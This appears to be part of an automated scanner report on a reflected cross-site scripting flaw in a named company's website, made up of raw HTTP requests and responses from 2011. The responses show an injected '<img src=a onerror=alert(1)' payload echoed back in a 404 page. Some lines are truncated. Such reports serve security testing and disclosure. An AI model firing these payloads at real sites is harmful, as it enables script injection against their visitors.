1. Cross-site scripting (reflected)
1.1. http://ww2.infoblox.com/products/vNIOS-trial-form.cfm [REST URL parameter 1]
Severity: | High |
Confidence: | Certain |
Host: | http://ww2.infoblox.com |
Path: | /products/vNIOS-trial |
GET /productscd711%253cimg%2520src Host: ww2.infoblox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.infoblox.com Cookie: __utma=260543314 |
HTTP/1.1 404 Not Found Connection: close Date: Wed, 09 Nov 2011 23:03:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 <META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.infoblox <html> <head> <meta http-equiv="Content <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> File not found: /productscd711<img src=a onerror=alert(1) </h1> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ww2.infoblox.com |
Path: | /products/vNIOS-trial |
GET /products/vNIOS-trial Host: ww2.infoblox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.infoblox.com Cookie: __utma=260543314 |
HTTP/1.1 200 OK Connection: close Date: Wed, 09 Nov 2011 23:03:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 <SCRIPT LANGUAGE="JavaScript"> document.domain = "infoblox.com"; </SCRIPT> <SCRIPT LANGUAGE="JavaScript"> document ...[SNIP]... if (window.name != "ifbody") top.location.href = "http://www.infoblox.com </SCRIPT> ...[SNIP]... |